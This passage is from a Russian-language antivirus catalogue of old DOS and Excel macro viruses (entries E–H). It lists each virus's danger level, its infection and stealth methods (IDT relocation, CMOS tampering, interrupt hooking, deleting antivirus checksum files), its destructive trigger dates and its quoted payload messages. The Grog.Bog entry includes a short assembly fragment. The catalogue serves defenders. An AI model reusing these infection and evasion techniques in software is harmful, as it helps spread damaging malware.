таблицу векторов прерываний, находящуюся по адресу 0000:03FF в дескрипторную таблицу прерываний IDT, находящуюся в зарезервированной вирусами памяти, посредством команды i386 - LIDT. В данном случае IDT является прямой заменой таблицы векторов прерываний i8086. И процессор i386 при вызове любого прерывания использует адрес прерывания из IDT, находящейся в телах вирусов Evolution. Реальную таблицу векторов прерываний можно "забить" нулями, но система будет прекрасно работать, ориентируясь на IDT. В данном случае определить наличие вирусов в памяти очень трудно, т.к., определение адресов перехваченных вирусами прерываний посредством прямого чтения их значений из таблицы векторов прерываний не предоставляется возможным.

ExcelMacro - вирусы

Вирусы, заражающие текстовые файлы-таблицы в формате Microsoft Excel. Заражение системы вирусами происходит при открытии на редактирование зараженных файлов-таблиц. При открытии файла-таблицы MS Excel вызывает, находящиеся в этих таблицах вирусные макросы, которые написаны на языке Visual Basic и в дальнейшем могут быть определены, как глобальные макросы. Данные макросы производят копирование вирусного тела -вирусных макросов при сохранении "старых таблиц" или вновь создаваемых через команду "Save As" или "Save". Также данные вирусы могут производить поиск таблиц в формате MS-Excel и производить в них запись вирусных макросов. При выходе из MS-Excel происходит автоматическая запись вирусных глобальных макросов в XLS-файл (как правило, это файл PERSONAL.XLS). Таким образом, при следующем старте MS-Excel снова а автоматически загрузит вирусные глобальные макросы из файла глобальных макросов PERSONAL.XLS.

ExcelMacro.Legend

Неопасный макро-стелс-вирус. Удаляет пункт меню "Tools|Macro". Если UserName="Pyro" и OrganizationName="VBB", то вирус прекращает работу и файлы не заражает. Может вывести сообщение:
Pyro [VBB]
You've Been Infected By Legend!

ExcelMacro.Robocop

Опасный макро-вирус. Первого марта вирус помещает в текущую таблицу текст "ROBOCOP Nightmare Joker [SLAM]".

ExcelMacro.Yohimbe

Опасный макро-вирус. Записывает строку "Yohimbe" в заголовок заражаемой таблицы. В 16:45 вставляет в текущую таблицу картинку и текст: FUCK YOU BUDDY".

ExeBug (1-6)

Очень опасные загрузочные стелс-вирусы. Иногда записывают в EXE-файлы троянский код, уничтожающий содержимое жесткого диска. Некоторые модификации вируса постоянно включает и выключает признак наличия в КМОП (CMOS)-памяти дисководов флоппи-дисков, корректируя контрольную сумму данной CMOS-памяти. При обращении к флоппи-дискам вирусы "включают" наличие дисководов в CMOS. После обращения - "отключают". В результате, при загрузке системы с "чистой" системной дискеты, дисководы дискет могут оказаться "неустановленными", и система в таком случае попытается загрузиться с жесткого инфицированного диска. Вирусы первым получат управление, установят свои резидентные копии в память, "включат" наличие дисководов в CMOS-памяти и отдадут управление Boot-сектору диска A:. Т.о., вирусы получат управление даже при загрузке с "чистого" системного гибкого диска! ExeBug (6) блокирует включение некоторых графических видеорежимов, содержит зашифрованный текст "Antigame from The Rat".

ExeHeader - вирусы

Вирусы, внедряющие свой код в заголовок (header) EXE-файлов. Некоторые из этих вирусов переводят файлы из формата EXE в COM заменой сигнатуры "MZ" на JUMP. Не изменяют длины файла.

ExeHeader.396

Периодически уничтожает содержимое 10 секторов, начиная с 7 сектора 0 цилиндра 4 головки первого жесткого диска.

ExeHeader.3E

Записывает свой код в область стартового кода инфицируемого EXE-файла, перенеся программный код в область заголовка EXE-файла. Заражает EXE- файлы при их закрытии (f.3Eh INT 21h) Содержит тексты "3E", "EXE".

ExeHeader.Andryushka (1,2)

Работоспособны только на XT. Содержат тексты "Copyright © 1992 by Андрюшка", "Mz1" или "MzExe".

ExeHeader.Dragon

Инсталлируется в память и внедряется в цепочку дисковых драйверов. Содержит строку "DRAGON-2 Anti".

ExeHeader.Funked (1,2)

Неопасные шифрованные резидентные стелс-вирусы. Трассируют INT 13h и вклиниваются в цепочку обработчиков INT 13h. Свою TSR-копию располагают в области HMA. После установки TSR-копии вирусы удаляют свой код из стартовавшего инфицированного файла. В дальнейшем вирусы скрывают свое присутствие в зараженных EXE-файлах.

ExeHeader.Gregory

Пытается заместить собой вирус ExeHeader.394. Содержит текст "<* Григорий Б.С. C-2.3 *>".

ExeHeader.I03

Опасный резидентный вирус. Заражает EXE-файлы, внедряя свой код в заголовок EXE-файла, в область неиспользуемых элементов таблицы перемещаемых символов. Изменяет размер заголовка EXE-файла (Header Size, смещение +8), не сохраняя оригинальное значение, и в освободившееся место записывает свой вирусный код. В соответствии с этим корректирует таблицу перемещаемых символов (Relocation Table). Т.к., вирус не сохраняет значение размера заголовка EXE-файла, то полное восстановление инфицированного файла невозможно, но вероятность работоспособности программы после лечения - довольно высока. В теле вируса имеется строка "~I~03".

ExeHeader.Kibina.390, 398

Опасные резидентные вирусы. Внедряются в дисковый буфер и перехватывают INT 13h. 26 апреля при записи секторов через INT 13h (AH=3) вирусы записывают в данные сектора часть своего кода, начинающийся с тестовой строки "Olya Kibina".

ExeHeader.Pure.427, 441 (1-3)

Написаны очень оригинально. ExeHeader.Pure.427 содержит интересные приемы, направленные против отладчиков.

ExeHeader.Renegade (1,2)

Излечивает файлы от вируса ExeHeader.Hobbit и записывает себя вместо него. Содержит строку "Renegade".

ExeHeader.TheRat

Опасный вирус, может разрушить некоторые файлы из-за ошибки. Содержит строку "The Rat, Sofia". Размещает свою резидентную копию в области стека DOS.

Exp.1617

Опасный резидентный вирус. При открытии инфицированного файла вирус удаляет свой код из данного файла. 24 января уничтожает первые сектора первого жесткого диска и выводит текст "Experimental virus v1.0 by TC (Spain 1994).".

Explosion.1000

Неопасный резидентный вирус. Иногда, 7 числа, выводит на экран текст:
Dis is one virus.
Leave the room IMMEDIATLY !!!
Your PC is about to EXPLODE within 20 sec !
00
EXPLOSION
What did you expect ?

Exterminate.1632

Неопасный резидентный зашифрованный вирус. Пытается разместить свою TSR-копию в области UMB. Может перехватить INT 21h "врезкой" 5 байт "длинного" JUMP на вирусный обработчик INT 21h.

0

6

F

Fab.1755

Неопасный резидентный вирус. Упакован LZEXE. Резидентная копия вируса "хранит" в памяти и свою нераспакованную копию. При заражении EXE- файлов вирус создает файл $$$$$$$$, в который записывает свою копию, упакованную LZEXE, а затем дописывает и весь файл-жертву. Оригинальный файл удаляется, а файлу $$$$$$$$,содержащему копию вируса присваивается имя оригинального файла. При невозможности открыть файл, из которого стартовал вирус, для считывания в память кода программы, вирус выводит текст "Error in EXE file". Содержит строку "*FAB*".

Face.414

Размещает свою TRS-копию в область памяти, содержащую 414 повторяющихся нулевых байт. Перехватывает INT 21h и заражает файлы при их создании. Иногда изменяет в выводимом на экран тексте некоторые символы на символ с кодом ASCII 01 ().

Face.2521

Неопасный резидентный вирус, заражающий COM, EXE и SYS-файлы. При первом запуске инфицированного COM или EXE-файла, вирус производит поиск на текущем диске файла CONFIG.SYS. Если данный файл найден, то вирус ищет в данном файле первый загружаемый файл с расширением SYS и заражает этот файл, если он еще не инфицирован. После чего вирус отдает управление программе - вирусоносителю. При загрузке в память инфицированного SYS-файла, вирус размещает свою копию в памяти и перехватывает INT 21h. При запуске COM и EXE-файлов вирус заражает их. Иногда вирус стирает текстовую строку "бегущим" символом ASCII 01 (). Содержит строки "COMMAND.COMEXECOMSPEC=C:\CONFIG.SYS DEVICE".

Fafb.948

Неопасный резидентный вирус. После установки в память своей резидентной копии, вирус самостоятельно "излечивает" своего файла-хозяина на диске, запускает его (f.4B00h Int 21h), после чего пытается еще заразить *.COM и *.EXE-файлы в каталогах, доступных через переменную PATH.

Fair.2083 (1,2), 2340

Неопасные резидентные шифрованные вирусы. Fair.2083, при старте какой- то программы, (вирусы проверяют заголовок файла) выдают сообщение:
This is an [ illegal copy ] of KeyPress virus remover
System Halted
Fair.2340 иногда печатают на экране текст "Time Machine, Running.".
Fair.2083 содержат также строку "Eternal Fair".

Fanthomas.1443

Неопасный файлово-загрузочный вирус. Инфицированные EXE-файлы заражают MBR жесткого диска, а инфицированные COM-файлы устанавливают в память резидентную копию и "перехватывают" INT 13h, 21h. 21 июля вирус "перегружает" систему. Содержит текст "-=ЁFANTHOMAS vir. 1.0ч© SzczecinekчDla Izy W. z BestwinyЁ=-".

Fantomas.432

Очень опасный резидентный вирус. В нечетные месяцы уничтожает первые 16 секторов логических дисков D:, E:, F: и выводит текст "FANTOMAS".

Farside.3008

Неопасный резидентный вирус. Иногда, а также 6 апреля выводит текст:
For cryin'out loud! My circuits are haunted by the ghost of a porcupine. . .
Содержит также строку "FARSIDE virus 1.00 © Windom Earle ROMANIA".

Fascist.442

Заражает *.COM файлы, производя поиск их на всех доступных устройствах жесткого диска в текущих каталогах. С ноября выводит в графическом видеорежиме изображение российского флага, знака "=" и фашистской свастики.

Favour.2576, 2608

Очень опасные резидентные стелс-вирусы. Favour.2608 после 8 июля 1995 года изменяет в некоторых EXE-файлах сигнатуру 'MZ' на нули; иногда "гасит" экран; содержит текстовую строку "FAVOUR". Favour.2576 начиная с июля 1995 года, если значение секунд системного времени больше 10, при закрытии файлов (не в формате EXE), файловый манипулятор (file handler) которых имеет значение больше, чем 5, вирус уничтожает 4 первых байта данных файлов. Иногда может вызывать печать экрана на принтер (Int 5 Print Screen). Содержит зашифрованное слово "KVITOK".

FaXFree.Abstract

Неопасный резидентный вирус. Содержит текст "MOSQUITO DOS 7.00 NODOSACT SPECIAL THANKS TO MAXCC ©91-92 rel.2soon ABSTRACTSPACE P. 0.98 Rev 4 24IX89 bye bye Copy at your own risk".

FaXFree.Fam

Опасный резидентный вирус. Может записать в загрузочный сектор текущего диска троянский код. Иногда выводит текст:
Umb ho utilizzato solo il virwork di DarkOver bye bye
Fago_T2 new name 2/4/92
Также содержит тексты:
Work Area stopHello this is the core Rev 5 5/17/91 P 1c
Fago_T2 data add 0022 year 0025
Fago_T2 count add 0027 cs 002b
FAM Associates. Kill with us F.A. from PE, Italy. Help us!

Fellow.1019

Неопасный резидентный вирус. В сентябре при старте любой программы выводит текст:
This message is dedicated to
all fellow PC users on Earth
Towards A Better Tomorrow
And A Better Place To Live In

Fence.2089

Неопасный резидентный шифрованный вирус. После 10000 нажатий на клавиши может проиграть мелодию и в это время изменять строчные буквы на прописные на экране монитора.

FFC.1000

Неопасный резидентный шифрованный вирус. Иногда помещает в служебную ячейку памяти клавиатуры 0040:001Ah значение 0FFh.

Ffff.432

Опасный резидентный вирус. 13 сентября уничтожает 13 секторов диска C:.

FifteenYears (1,2)

Опасные загрузочные шифрованные вирусы. 7 апреля вирусы уничтожают содержимое секторов дисков, записывая в них текст "Esto te pasa por programas que a nosotros nos cuesta tanto trabajo hacer. Que te quede de Experiencia, MВxico,1994". Также содержат текст "This Virus is from MEXICO, I have 15 years old".

Filler (1-3)

Опасные загрузочные стелс - вирусы. При заражении флоппи - дисков форматируют дополнительную дорожку, на которую записывают свой код и оригинальный загрузочный сектор.При запуске COMMAND.COM,вирусы копируют свои резидентные копии в область "нижних" адресов памяти. Могут вывести на экран текст:
Haha,vбrus van a gВpben!!
Ez egy eddig mВg nem kФzismert vбrus. De hamarosan az lesz.
A neve egyszerБen tФltФgetФ
Ezt a nevВt onnan kapta, hogy feltФltФgeti a FAT-tаblаt
kФlФnbФzФ alakzatokkal.
Ez mаr meg is tФrtВnt !!!

Find.229, 512, 600, Find.BigX

Неопасные резидентные вирусы. Заражают файлы при вызове функций FindFirst, FindNext (f.11h,12h,4Eh,4Fh INT 21h). Find.BigX не заражает файлы, начинающиеся на SC или AI. Он содержит строку [BigX].

FinnPoly.2179

Опасный резидентный полиморфный вирус. По возможности устанавливает свою резидентную копию в область UMB. Создает расшифровщик вирусного кода в области программного кода, после чего передает ему управление с помощью команды CALL SP. Данная команда некорректно работает на компьютерах с процессором i386. Вирус размножаться на таких компьютерах не сможет, и скорее всего, "завесит" систему. Вирус удаляет файлы: ANTI-VIR.DAT, AV.CRC, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, MSAV.CHK. Если значение дня равно значению месяца, то вирус выводит текст:

First.343

Неопасный резидентный вирус. Содержит текст "First 1.1 Copyright © 1997 DataLife+ Corp.".

First.3032, 3173

Неопасные резидентные вирусы. "Перехватывают" INT 9,13h, 1Ch, 21h, 28h. Выводят на экран мелькающую строку "1st".

Fish#6 (1-5)

Резидентные опасные шифрованные стелс-вирусы. Шифруют свой код не только в файлах, но и в памяти, используя некоторые антиотладочные приемы. Fish#6 (2), при совпадении значения текущего дня со значением месяца, уничтожает содержимое жесткого диска. С 1991 года вирусы при старте выводят сообщение:
FISH VIRUS #6 - EACH DIFF - BONN 2/90"
и "вешают" систему. Содержат также тексты "COD", "SHARK", "CARP", "BASS", "TROUT", "MUSKYZ", "SOLE", "PIKE", "MACKEREL", "FISH", "TUNA", "FISH FI","Don't trouble trouble until trouble troubles you.","©Fly".

Fisher.1100, 2420

Резидентные вирусы. Fisher.2420 - опасен, при выводе на печать, данный вирус выводит после знаков препинаний нецензурные словечки. Fisher.1100 может вывести текст "© Copyright 1992 by Fisher. Version 3.0 . PUNK- ROCK & BEER FOREVER !". Fisher.2420 содержит текст "© Copyright 1991- 92 by Fisher. Version 2.0 .Идея эффектов на принтере - ДАС-2, комната 1405 .".

Flagyll.316, 369

Очень опасные резидентные вирусы. Записывают свой код в начало EXE- файлов, не сохраняя программный код. Содержат текстовые строки "-=[Crypt Newsletter 13]=-", "Flagyll".

Flame (1-3)

Опасные Boot-вирусы. Оригинальный MBR не сохраняют, на дискетах Boot- сектор сохраняет по адресу: головка-1, цилиндр-25, сектор-1, уничтожая данные в данном секторе. Иногда рисуют на экране картинку похожую на пламя.

Flex.491

Неопасный резидентный вирус. 17 числа после 22.00 при нажатии на клавишу "Del" выводит сообщение "Flex-It-Up gal! Time to have sex!". Имеет также строки "Admiral Bailey", "[FLEX]".

Flip.2153, 2343, 2365

Неопасные файлово-загрузочные полиморфные вирусы. Заражают MBR жесткого диска и COM, EXE-файлы. 2 числа месяца вирус "переворачивает" экран. Левый верхний угол экрана оказывается в правом нижнем углу. Flip.2343, 2365 производят поиск в каждом инфицируемом файле последовательности команд:
MOV DX,Data1
MOV Data2,DX
MOV DX,Data3
MOV Data4,DX
и изменяют их на вызов INT 9Fh (CD 9F). Данная последовательность команд используется в командном процессоре COMMAND.COM при выводе на экран результатов длин файлов после поиска файлов (функции (FindFirst, FindNext). Вирусы "перехватывают" INT 9Fh и при вызове данного прерывания уменьшают полученное значение длины файла на величину вирусного кода. Содержат текст "OMICRON by PsychoBlast".

Floyd.1542

Неопасный резидентный шифрованный вирус. Иногда выводит сообщение:
Now life devalues day by day, as friends and neighbours turn away,
And there's a change, that even with regret, cannot be undone...
PiNK FLOYD, The Division Bell.
MCH' 97
[Any Key]
Также содержит строки "FLOYD ViRUS v.1.01.095", "MCH".

Folks.618

Неопасный резидентный вирус. Не инсталлируется в память если текущий каталог содержит подкаталог \LAN. В 0.00, 3.00, 6.00 и 9.00 выводит текст "THAT'S ALL, FOLKS !".

Forever.896

Не заражает программу AIDSTEST. Содержит строки "No WINDOWS, MS-DOS forever...", "Excuse Me, please...".

Forever.930

Не заражает программы AIDSTEST.EXE и ADINF.EXE. Содержит зашифрованный текст "No WINDOWS, MS-DOS forever...".

Form (1-4)

Опасные вирусы. Могут уничтожить данные на жестком диске. Содержат строку "The FORM-Virus sends greetings to everyone who's reading this text. FORM doesn't destroy data! Don't panic! Fuckings go to Corinne.".

Frankenstein

Очень опасный загрузочный вирус. Заражает MBR всех жестких дисков, установленных в компьютере. "Перехватывает" INT 8, 12h, 13h. Может уничтожить содержимое секторов жестких дисков.

Freddy.1663

Опасный зашифрованный нерезидентный вирус. Может удалить файлы с расширениями, отличными от COM, EXE, SYS. Содержит текст:
FREDDY_SOFT
jln lobilobi blok Q27 Kalibata indah JAKARTA Selatan
Greetings to STACK RIPPER, DOUBLE CLICK, SINGLE DRIVE
COMEXESYSAUTOEXEC.BATIBMBIO.COMIBMDOS.COM

Freddy.1870

Очень опасный резидентный вирус. Заражает файл COMMAND.COM по алгоритму вируса Lehigh, т.е., длина COMMAND.COM не изменяется. Может затереть сектора диска строкой "Freddy Krg".

Freddy.2271

Опасный полиморфный резидентный вирус. Иногда при записи в файлы (f.40h INT 21h) изменяет случайный байт. Содержит текстовые строки "Fridrik!" и "Freddy KRueGer 2.1".

Freedom.2448, 2560, 3600

Очень опасные резидентные зашифрованные вирусы. При обнаружении слов "воен", "арми", "солдат", "оруж", "военком", "полковник", "призывн", "вооружен" вирус уничтожает случайные сектора на жестком диске (Freedom.2560, 3600) или все сектора (Freedom.2448), записывая в них фразу "Закон о всеобщей воинской обязанности - ГРУБЕЙШЕЕ НАРУШЕНИЕ прав Человека !". Содержат тексты "COMMAND AIDS .EXE .COM", "F R E E D O M", "ПОМНИТЕ - УНИЧТОЖИВ ЭТУ ПРОГРАММУ ИЛИ ЕЕ СОЗДАТЕЛЯ, ВЫ УНИЧТОЖИТЕ СЛЕДСТВИЕ, НО НЕ ПРИЧИНУ ..."

Fricker.395

Неопасный нерезидентный вирус. В девятом часу утра выводит на экран текст "FRICKER-1 is glad to meet YOU!".

Frodo.4096 (1,2)

Опасные резидентные стелс-вирусы. После 21 сентября должны записывать в MBR код.

Fsmm.2971

Опасный резидентный полиморфный вирус. Внедряет вирусный код сразу за заголовком EXE-файла,зашифровав и переместив предварительно программный код в конец файла. Из-за ошибки в вирусе некоторые инфицированные файлы восстановлению не подлежат. Такие файлы при старте, как правило, "вешают" систему. Вирус содержит текст "Fire/Space version 1.0, from Новгоpод, with FSMM v1.0(Fire/Space Mutant Machine)".

Fumble.867

Опасный нерезидентный вирус. Оставляет в памяти резидентный код "на INT 16h", который подменяет некоторые символы, вводимые с клавиатуры. Содержит строку "V1".

Funky.692

Неопасный резидентный вирус. Ищет в COM-файлах последовательность 692ух повторяющихся байт и если находит ее, то внедряет свой код в данное место файла. Если данной последовательности нет, то вирус заражает файл стандартным способом. При нажатии на Ctrl-Alt-Del издает некоторые музыкальные звуки.

Future.3180

Неопасный резидентный вирус. Заражает COMMAND.COM и файлы на флоппи- дисках. Содержит зашифрованные тексты:
COMSPEC=C:\COMMAND.COM command.com \ARJ. .COM .com .EXE .exe \AIN. \ain. \RAR. \MSAV. C:\COMMAND.COM Terminator Model 1.3 *Future Virus*

Fy.338

Неопасный нерезидентный вирус. Если вирус не находит *.COM-файлы для заражения, то он пытается положить в буфер клавиатуры нецензурное выражение на английском языке "F... YOU".

Fynov.4309

Опасный резидентный шифрованный вирус. Иногда выводит на весь экран при некоторых ошибках английское нецензурное выражение.При старте программы *ST (AIDSTEST) иногда выводит текст "No viruses". ПРи старте программы *BO (?) "перехватывает" INT 17h и может при выводе на принтер вставить уже русское непотребное слово. Иногда игнорирует нажатие на клавиши.

0

7

G

Galicia (1,2)

Опасные загрузочные вирусы. 22 мая после 12.00 выводят текст "Galicia contra telefonica!" и форматируют первый цилиндр первого жесткого диска.

Galya.500 (1,2)

Очень опасный вирус. 17 декабря уничтожает по 255 секторов на 3 логических разделах жесткого диска, выводит текст "Today is GALYA'S birthday" и "вешает" систему. Думаю, что Галя очень обрадуется, увидев на экране своего компьютера данное поздравление в свой день рождения. Неплохой подарок.

GCAE-вирусы

GCAE (Golden Cicada Abnormal Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан вирусописателем по "кличке" Golden Cicada in Taipei, Taiwan. Генератор содержит текст "[GCAE] v1.0".

GCAE.Demo

Неопасный демонстрационный вирус данного генератора, распространяемый в комплекте с ним в виде файла и исходного текста.

GCAE.Vimg

С декабря 1995 года при старте вируса будет выводить на экран текст:
[Mind Fucker]
By HERETiX & WiLD D0G,[ViMG]
WiLD D0G

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Ira
Содержит также текстовую строку "//UCL".

Gentry.1570

12 июня выводит на экран текст:
С ПРАЗДНИКОМ ГОСПОДА !

Gexa.2324

Неопасный резидентный полиморфный вирус. Устанавливает свою резидентную копию в область UMB. При старте программы, начинающейся на AIDS - вирус выводит текст "Не поможет!". При вводе с клавиатуры слова "gexa ", вирус помещает в буфер клавиатуры фразу "- i am here!", при вводе "yalta " - фразу "- nice town..!" и обезвреживает при этом свой резидентный обработчик INT 21h.

Ginger.2691

Незначительно отличается от Ginger.2774 (см. ниже). Сохраняет адрес оригинального Boot-сектора, но только головку и сектор. Значение же цилиндра не проверяет, считая, что он всегда должен быть - 0. Если же значение цилиндра отличается от нуля, то загрузка операционной системы с жесткого диска на таком компьютере становится невозможной.

Ginger.2774

Файлово-загрузочный стелс-вирус. При запуске зараженной программы корректирует MBR, устанавливая адрес активного Boot-сектора на цилиндр-0, головка-0, сектор-2. Старый адрес Boot-сектора не сохраняет, считая что он всегда должен располагаться по адресу цилиндр-0, головка-1, сектор-1. Начиная с сектора 2 записывает в 6 секторов свой код. Содержит текстовые строки: "You can't catch the Gingerbread Man!", "Bad Seed - Made in OZ", "10/23/92".

Ginger.Orsam.2624

Дальнейшее развитие Ginger.2774. Содержит строки "You can't catch the Gingerbread Man!" и "Orsam - Made in OZ".

Girl.1036

Опасный нерезидентный вирус. 3 июля пытается считать загрузочный сектор диска A:, создает файл A:\BOOT.SEC, записывает в данный файл 512 байт содержимое оригинального загрузочного сектора и записывает в данный сектор код, который при загрузке системы с такого диска выводит на экран текст "I

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

YOU GIRL IN GREEN!".

Girls.1829

Неопасный нерезидентный вирус. Иногда завешивает систему. Может вывести текст: "I love you, girls ! You are so beautiful !".

Globus.1742

Неопасный резидентный вирус. Создает файл C:\REKLAMA.TXT, в котором помещает рекламу некой фирмы "ГЛОБУС-ПЛЮС" из г. Иваново. Несколько странная роль участия в данной области рекламы компьютерного вируса.

Gloomy.2000

Неопасный резидентный вирус. Вирус перехватывает INT 8 и через каждые 24 секунды устанавливает новые значения регистров DAC монитора. В результате создается впечатление, что экран монитора медленно "гаснет".

Gluck.761

Oпасный резидентный вирус. Удаляет файлы CHCKLIST.MS. В 0 часов выводит текст "You iave a щGLUCKщ!!!" и "трясет" экран. При старте программы *WEB.EXE выводит текст "Error reading fat!" и завершает ее работу.

Goblin.1759

Неопасный резидентный файлово-загрузочный стелс-вирус. Иногда "мигает" экраном. Содержит строку "DELWIN".

GoldBug (1-5)

Опасные полиморфные файлово-загрузочные стелс-вирусы-спутники. Заражают MBR жесткого диска, Boot-сектора дискет емкостью 1.2M и *.EXE-файлы, создавая вирусы-спутники с именем EXE-файла. Сам же EXE-файл переименовывают в файл со своим прежним именем, но без расширения. Размещают свою TSR-копию в области HMA-памяти. Перехватывают INT 13h, 21H, 2Fh (и INT 10h на этапе инсталляции с инфицированного диска, для контроля за загрузкой DOS в HMA-память). Содержат текстовые строки "CHKLIST????" и "1O7=0SLMTA". Последнюю строку в обратном порядке, при заражении EXE-файлов, вирусы могут послать в модемный порт - ATMLS0=7O1. Удаляют файлы CHKLIST???? в директории заражаемого EXE-файла. Удаляют программы при их старте, содержащие в своем имени предпоследнюю букву "A" и последнюю букву, значение ASCII кода которой меньше 79 (4Bh) "O". Например, при запуске программа SCAN.EXE будет удалена вирусами GoldBug.

Gorlovka.1022

Неопасный резидентный вирус. Для COM-файлов внедряется в область повторяющихся байт кода или данных, не изменяя длины инфицированной программы. Содержит текст "GORLOVKA9101".

Gosha.1831

Опасный резидентный вирус. Внедряется в середину файлов, имеющих длины 54619, 52925, 47845 (разные версии COMMAND.COM). 4 марта и 7 ноября уничтожает содержимое текущего флоппи-диска или первого жесткого диска. Содержит текст "GOSHA".

GreenMonster.711, 784, 839

Опасные резидентные вирусы. Периодически пытаются отформатировать одну дорожку гибких дисков. Содержат текст "Green Monster. I"m happy".

Grace.1346

Неопасный резидентный вирус. Внедряет свой код в середину и конец файлов. Иногда может вывести текст "Have a nice piss-up!" или "Have a DOS!". Содержит тексты "-[Grace] by TДLФN 94-", "You make me sick I make viruses".

GraveLion.2250

Неопасный резидентный файлово-загрузочный полиморфный вирус. При старте инфицированной программы заражает MBR, изменяя в ней ссылку на первый загрузочный сектор, и подставляет вместо этого адреса ссылку на свой загрузчик. При старте программ, имена которых заканчиваются на B, F и T (а также при нажатии на Ctrl-Alt-Del) вирус удаляет в MBR ссылку на свой код, по окончании работы этих программ опять заражает MBR.Содержит текст "[Бычий Цепень] v1.0 Copyright © 1995 Grave Lion". Иногда при ошибке в процессе загрузки может вывести текст "Access to Hard Drive denied...".

Gregory.996

Очень опасный нерезидентный вирус. Из-за ошибки разрушает файлы при заражении. Может вывести текст "<Григорий-01.2>".

Gremlin.1405

Неопасный резидентный полиморфный вирус. Содержит следующие тексты:
[ Gremlin 1.04 / AVL ]
[ Как видите, г-н Данилов, обмануть Ваш эвристический анализатор не так уж и трудно... ]
KREG 1.01 / AVL

Gripe.1985

Неопасный резидентный полиморфный вирус. Не заражает файлы,начинающиеся на TB, SC, CL, F-, MS, NA. Содержит текст "ViRUS GRiPE by dEMETH KNOX (17/03/95, ARGENTINA)".

Grog.2075

Опасный шифрованный вирус. Уничтожает файлы CHKLIST.CPS. Не заражает файлы, имеющие сочетания букв из последней строки.

Grog.2825

Опасный шифрованный вирус. Уничтожает файлы ANTI-VIR.DAT, CHKLIST.*, \NAV_._NO Не заражает файлы, имеющие сочетания букв из последней строки.

Grog.4ever.1200

Неопасный полиморфный вирус. В инфицированных программах может изменить строку "Microsoft" (если таковая имеется) на строку "Grog*Soft". Данная строка будет изменена только в памяти, и если эта строка выводится на экран, то вместо названия известной фирмы будет выведена строка-копирайт вируса из Италии.

Grog.Bog.233

Неопасный нерезидентный вирус. Ищет MS-Windows EXE-файлы и внедряется в их код, работающий под DOS. Обычно Windows EXE-файлы имеют код, который выполняется только в DOS и служит для того, чтобы сообщать пользователю о том, что данная программа должна работать под управлением MS-Windows. Как правило, данный код состоит из строки типа "This program requires Microsoft Windows." и нескольких инструкций ассемблера, выводящих данный текст на экран и возвращающих управление обратно в среду DOS. Данные инструкции выглядят, обычно, так:
POP DX ; указатель на строку о необходимости Windows
PUSH CS
POP DS
MOV AH,9
INT 21h ; вывод сообщения на экран
MOV AX,4C01h
INT 21h ; окончание работы и выход в DOS
Вирус Grog.Bog.233 считывает 256 начальных байт DOS-кода и ищет в них строку "Win". Если строка найдена, то вирус ищет последние 3 байта указанного выше DOS-кода (4C CD 21). Если данные байты найдены, вирус записывает 233 байт своего кода, начиная с последнего вызова INT 21h. Таким образом DOS-код после этого выглядит следующим образом:
MOV AH,9
INT 21h ; вывод сообщения на экран
MOV AX,4C01h
CALL $+3 ; вместо окончания работы и выхода в DOS - код вируса
POP BP
При запуске под MS-Windows такой файл будет работать как обычно, т.к., DOS-код в этом случае не получает управления. При запуске же из DOS программа расскажет о необходимости присутствия MS-Windows, после чего вирус начнет искать очередную жертву. Содержит текстовую строку "BOG © '93 by GROG - Italy".

Grog.Hop

Производит поиск и заражение *.COM файлов только на дисках A: и B:. Внедряется в середину файла, в область повторяющихся байт, используя для записи в файл на гибких дисках INT 40h. Содержит тексты:
HopHopHop © '93 By GROG - Italy
"Guida alla Corsa"
Capitolo primo
Come correre al modo dei conigli.
Hop Hop Hop
Hop Hop Hop

Grog.Miami

Неопасный нерезидентный полиморфный вирус. Содержит текст:

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Mi Ami

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

©

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

'93

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

by

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

GROG

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

-

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Italy

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

"Mi ami?" chiese lei.
"Ma certo", rispose lui.
"Mi ami davvero?" chiese lei.
"Ma certo", rispose lui.
"Mi ami davvero davvero?" chiese lei.
"No", rispose lui.
"Mi ami?" chiese lei.
"Ma certo", rispose lui.
Lei non chiese piu' altro.

Grog.Sempre

Очень опасный нерезидентный вирус. Производит чтение секторов флоппи- дисков через INT 40h и поиск в них первой команды JMP или CALL (байт E9h или E8h). Если данный байт будет найден, то вирус записывает свой код в данный сектор. При ошибке чтения сектора вирус выводит текст:
"Il nostro amore durera' per sempre", disse lui.
"Oh, si, si, si!", esclamo' lei.
"Intendendo 'sempre' in senso relativo, pero'", disse lui.
Lei lo colpi' con una racchetta da sci.
Содержит также строку "_Sempre_©_'93_by_Grog_Italy_".

0

8

H

Ha.798

Очень опасный нерезидентный замещающий программный код вирус. В субботу пытается отформатировать 45 начальных цилиндров первого жесткого диска. Иногда выводит сообщение:
HA! HA! HA!
Your computer is infected now by the
most likely and non-dangerous virus!
Please enjoy it!
Your MBR may now be corrupted...
и уничтожает содержимое MBR. По окончании своей работы выводит текст:
General error reading drive C: Abort, Retry, Ignore, Fail?

Haharin

Опасный загрузочный вирус. Не сохраняет оригинальный сектор при заражении флоппи-дисков. После 256 загрузок с жесткого диска уничтожает содержимое первого жесткого диска и выводит на экран текст: "Haharin is not dead !".

Halfive.512

Опасный файлово-загрузочный вирус. Блокирует удаление файлов. Содержит текст "ONE_HALF35/7".

Harlot.738, 5632 (1-4)

Harlot.5632 (1-4) - опасные резидентные вирусы. "Сбивают" системное время. Периодически выводят в рамке случайное сообщение (см. SGWW.Nostardamus.5995) и ждут нажатия на клавишу "пробел". Иногда выводят еще одно сообщение:
Вирус HARDY HARLOT v1.06 by CRAZY
Киев , КИИГА ФАРЭО 101 ,20.05.94
CRAZY подружись со мной. ФАВТ 2..
Исправлено: файлов - 25
Virus segment - 9E5F
Harlot.738 содержит текст:
Hello ! I'm virus Hardy-Harlot !
Don't hurt me ,please . v1.03

Harmless.1082

